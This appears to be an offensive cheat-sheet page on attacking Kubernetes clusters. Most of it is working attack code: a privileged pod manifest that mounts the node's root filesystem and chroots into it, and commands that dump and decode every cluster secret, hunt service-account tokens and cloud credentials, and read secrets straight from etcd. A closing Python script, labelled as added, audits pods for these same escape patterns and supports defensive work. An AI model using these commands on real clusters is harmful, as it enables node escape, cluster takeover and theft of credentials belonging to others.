Kubernetes Attacks

Exploitation

Kubernetes environments often have misconfigurations that allow privilege escalation, lateral movement, and cluster takeover.

Privilege Escalation via Pod Creation

k8s-privesc-pod.sh
bash
# If you can create pods, create a privileged one
cat << EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: pwned
spec:
  containers:
  - name: pwned
    image: ubuntu
    command: ["sleep", "infinity"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /
EOF

# Get shell and access host filesystem
kubectl exec -it pwned -- chroot /host bash

Secret Extraction

k8s-secrets.sh
bash
# Get all secrets
kubectl get secrets -A -o yaml

# Decode base64 secrets
kubectl get secret <name> -o jsonpath='{.data.password}' | base64 -d

# Look for service account tokens
kubectl get secrets -A | grep token

# Extract etcd secrets directly
etcdctl get /registry/secrets --prefix --keys-only
etcdctl get /registry/secrets/default/mysecret

# Cloud provider credentials (quote the pattern: an unquoted | is a shell pipe, not regex alternation)
kubectl get secrets -n kube-system | grep -iE 'aws|gcp|azure'

Cluster Admin

If you can create pods that run under the cluster-admin service account, or pods with a hostPath mount of the node's root filesystem, you effectively have full control of the cluster and every node.
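As an added defensive example (not code from the original page): a small audit that flags pod specs carrying the node-escape pattern shown above, privileged container plus a hostPath mount of the node root, plus host namespaces, in the JSON shape `kubectl get pod -o json` returns. The sample manifests are constructed inline; the function names are this example's own.

```python
import json

# Constructed sample (not live cluster output): the privileged hostPath pod from
# the page, in the JSON shape `kubectl get pod <name> -o json` returns.
SAMPLE_POD_JSON = """{
  "apiVersion": "v1", "kind": "Pod",
  "metadata": {"name": "pwned", "namespace": "default"},
  "spec": {
    "containers": [{"name": "pwned", "image": "ubuntu",
                    "securityContext": {"privileged": true},
                    "volumeMounts": [{"name": "host", "mountPath": "/host"}]}],
    "volumes": [{"name": "host", "hostPath": {"path": "/"}}]
  }
}"""

# Constructed benign pod for comparison: no host namespaces, no hostPath, not privileged.
BENIGN_POD_JSON = """{"metadata": {"name": "web"},
  "spec": {"containers": [{"name": "web", "image": "nginx",
           "volumeMounts": [{"name": "tmp", "mountPath": "/tmp"}]}],
           "volumes": [{"name": "tmp", "emptyDir": {}}]}}"""


def node_escape_findings(pod: dict) -> list[str]:
    """Return the reasons a pod spec can reach the underlying node: host
    namespaces, privileged containers, and hostPath volumes that are mounted."""
    name = pod.get("metadata", {}).get("name", "<unnamed>")
    spec = pod.get("spec", {})
    findings = []
    for key in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(key):
            findings.append(f"{name}: {key} enabled")
    # Map volume name -> host path so each container's mounts can be resolved.
    host_paths = {v["name"]: v["hostPath"]["path"]
                  for v in spec.get("volumes", []) if "hostPath" in v}
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        if (c.get("securityContext") or {}).get("privileged"):
            findings.append(f"{name}/{c['name']}: privileged container")
        for m in c.get("volumeMounts", []):
            path = host_paths.get(m["name"])
            if path is None:
                continue
            what = "node root filesystem" if path == "/" else f"hostPath {path}"
            mode = "read-only" if m.get("readOnly") else "read-write"
            findings.append(f"{name}/{c['name']}: mounts {what} at {m['mountPath']} ({mode})")
    return findings


def scan_pod_json(text: str) -> list[str]:
    """Parse one pod document (as returned by `kubectl get pod -o json`) and audit it."""
    return node_escape_findings(json.loads(text))


if __name__ == "__main__":
    for doc in (SAMPLE_POD_JSON, BENIGN_POD_JSON):
        print(scan_pod_json(doc) or ["no node-escape indicators"])
```

Run it over each item of `kubectl get pods -A -o json` to inventory existing exposure; Pod Security Admission's baseline profile rejects these same fields at admission time, so a non-empty result usually means a namespace is not enforcing it.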